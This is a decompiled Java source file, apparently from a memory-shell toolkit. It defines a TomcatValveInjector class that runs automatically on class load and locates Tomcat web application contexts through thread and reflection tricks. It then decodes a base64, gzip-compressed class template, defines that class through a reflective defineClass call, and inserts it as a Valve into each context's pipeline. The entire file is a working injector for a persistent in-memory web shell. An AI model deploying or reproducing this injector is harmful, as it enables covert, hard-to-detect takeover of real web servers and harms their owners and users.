package com.reajason.javaweb.memshell.injector.tomcat;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.zip.GZIPInputStream;

/* loaded from: input_file:com/reajason/javaweb/memshell/injector/tomcat/TomcatValveInjector.class */
public class TomcatValveInjector {
    public TomcatValveInjector() {
        try {
            for (Object obj : getContext()) {
                inject(obj, getShell(obj));
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public String getClassName() {
        return "{{className}}";
    }

    public String getBase64String() {
        return "{{base64Str}}";
    }

    public List<Object> getContext() throws Exception {
        ArrayList arrayList = new ArrayList();
        for (Thread thread : (Thread[]) invokeMethod(Thread.class, "getThreads", new Class[0], new Object[0])) {
            if (thread.getName().contains("ContainerBackgroundProcessor")) {
                Iterator it = ((HashMap) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children")).values().iterator();
                while (it.hasNext()) {
                    Iterator it2 = ((HashMap) getFieldValue(it.next(), "children")).values().iterator();
                    while (it2.hasNext()) {
                        arrayList.add(it2.next());
                    }
                }
            } else if (thread.getContextClassLoader() != null && (thread.getContextClassLoader().getClass().toString().contains("ParallelWebappClassLoader") || thread.getContextClassLoader().getClass().toString().contains("TomcatEmbeddedWebappClassLoader"))) {
                arrayList.add(getFieldValue(getFieldValue(thread.getContextClassLoader(), "resources"), "context"));
            }
        }
        return arrayList;
    }

    private Object getShell(Object obj) throws Exception {
        ClassLoader classLoader = obj.getClass().getClassLoader();
        try {
            return classLoader.loadClass(getClassName()).newInstance();
        } catch (Exception e) {
            byte[] gzipDecompress = gzipDecompress(decodeBase64(getBase64String()));
            Method declaredMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            declaredMethod.setAccessible(true);
            return ((Class) declaredMethod.invoke(classLoader, gzipDecompress, 0, Integer.valueOf(gzipDecompress.length))).newInstance();
        }
    }

    public void inject(Object obj, Object obj2) throws Exception {
        Object invokeMethod = invokeMethod(obj, "getPipeline", null, null);
        if (isInjected(invokeMethod)) {
            System.out.println("valve already injected");
        } else {
            invokeMethod(invokeMethod, "addValve", new Class[]{obj.getClass().getClassLoader().loadClass("org.apache.catalina.Valve")}, new Object[]{obj2});
            System.out.println("valve injected successfully");
        }
    }

    public boolean isInjected(Object obj) throws Exception {
        Iterator it = Arrays.asList((Object[]) invokeMethod(obj, "getValves", null, null)).iterator();
        while (it.hasNext()) {
            if (it.next().getClass().getName().contains(getClassName())) {
                return true;
            }
        }
        return false;
    }

    public static byte[] decodeBase64(String str) throws Exception {
        try {
            Object invoke = Class.forName("java.util.Base64").getMethod("getDecoder", new Class[0]).invoke(null, new Object[0]);
            return (byte[]) invoke.getClass().getMethod("decode", String.class).invoke(invoke, str);
        } catch (Exception e) {
            Class<?> cls = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) cls.getMethod("decodeBuffer", String.class).invoke(cls.newInstance(), str);
        }
    }

    public static byte[] gzipDecompress(byte[] bArr) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        GZIPInputStream gZIPInputStream = null;
        try {
            gZIPInputStream = new GZIPInputStream(new ByteArrayInputStream(bArr));
            byte[] bArr2 = new byte[4096];
            while (true) {
                int read = gZIPInputStream.read(bArr2);
                if (read <= 0) {
                    break;
                }
                byteArrayOutputStream.write(bArr2, 0, read);
            }
            byte[] byteArray = byteArrayOutputStream.toByteArray();
            if (gZIPInputStream != null) {
                gZIPInputStream.close();
            }
            byteArrayOutputStream.close();
            return byteArray;
        } catch (Throwable th) {
            if (gZIPInputStream != null) {
                gZIPInputStream.close();
            }
            byteArrayOutputStream.close();
            throw th;
        }
    }

    public static Object getFieldValue(Object obj, String str) throws NoSuchFieldException, IllegalAccessException {
        Class<?> cls = obj.getClass();
        while (true) {
            Class<?> cls2 = cls;
            if (cls2 == Object.class) {
                throw new NoSuchFieldException(str);
            }
            try {
                Field declaredField = cls2.getDeclaredField(str);
                declaredField.setAccessible(true);
                return declaredField.get(obj);
            } catch (NoSuchFieldException e) {
                cls = cls2.getSuperclass();
            }
        }
    }

    public static Object invokeMethod(Object obj, String str, Class<?>[] clsArr, Object[] objArr) throws NoSuchMethodException {
        try {
            Class<?> cls = obj instanceof Class ? (Class) obj : obj.getClass();
            Method method = null;
            while (cls != null && method == null) {
                if (clsArr == null) {
                    try {
                        method = cls.getDeclaredMethod(str, new Class[0]);
                    } catch (NoSuchMethodException e) {
                        cls = cls.getSuperclass();
                    }
                } else {
                    method = cls.getDeclaredMethod(str, clsArr);
                }
            }
            if (method == null) {
                throw new NoSuchMethodException("Method not found: " + str);
            }
            method.setAccessible(true);
            return method.invoke(obj instanceof Class ? null : obj, objArr);
        } catch (NoSuchMethodException e2) {
            throw e2;
        } catch (Exception e3) {
            throw new RuntimeException("Error invoking method: " + str, e3);
        }
    }

    static {
        new TomcatValveInjector();
    }
}
